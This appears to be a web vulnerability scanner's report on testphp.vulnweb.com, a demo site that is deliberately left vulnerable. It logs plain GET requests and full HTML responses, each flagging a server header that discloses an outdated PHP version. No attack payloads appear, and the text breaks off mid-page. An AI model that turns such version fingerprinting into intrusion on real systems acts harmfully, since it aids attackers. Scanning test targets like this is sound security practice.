URL | http://testphp.vulnweb.com/hpp/?pp=12 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 266 bytes. |
GET http://testphp.vulnweb.com/hpp/?pp=12 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/hpp/ |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:05 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 383 |
Response Body - size: 383 bytes. |
<title>HTTP Parameter Pollution Example</title>
<a href="?pp=12">check</a><br/> <a href="params.php?p=valid&pp=12">link1</a><br/><a href="params.php?p=valid&pp=12">link2</a><br/><form action="params.php?p=valid&pp=12"><input type=submit name=aaaa/></form><br/> <hr> <a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a> |
URL | http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 290 bytes. |
GET http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/hpp/?pp=12 |
Request Body - size: 0 bytes. |
|
Response Header - size: 219 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 7 |
Response Body - size: 7 bytes. |
valid12
|
URL | http://testphp.vulnweb.com/index.php |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 260 bytes. |
GET http://testphp.vulnweb.com/index.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:44 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4958 |
Response Body - size: 4,958 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>Home of Acunetix Art</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for Acunetix WVS.</h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?artist=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 297 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?artist=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php?artist=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 7994 |
Response Body - size: 7,994 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>r4w8173</h2><div class='story'><a href='product.php?pic=1'><h3>The shore</h3></a><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=1','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=2'><h3>Mistery</h3></a><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a>Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=2','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=3'><h3>The universe</h3></a><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet. Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=3','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=4'><h3>Walking</h3></a><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=4','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=5'><h3>Mean</h3></a><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=5','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=6'><h3>Thing</h3></a><p><a href='showimage.php?file=./pictures/6.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/6.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=6','comment','width=500,height=400')">comment on this picture</a></p></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?artist=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 297 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?artist=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php?artist=2 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5193 |
Response Body - size: 5,193 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Blad3</h2><div class='story'><a href='product.php?pic=7'><h3>Trees</h3></a><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a>bla bla bla</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p><a href='#' onClick="window.open('./comment.php?pid=7','comment','width=500,height=400')">comment on this picture</a></p></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?artist=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 297 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?artist=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php?artist=3 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4699 |
Response Body - size: 4,699 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 288 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:53 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 7880 |
Response Body - size: 7,880 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Posters</h2><div class='story'><a href='product.php?pic=1'><h3>The shore</h3></a><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=1','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=2'><h3>Mistery</h3></a><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a>Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=2','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=3'><h3>The universe</h3></a><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet. Donec molestie. Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=3','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=4'><h3>Walking</h3></a><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing 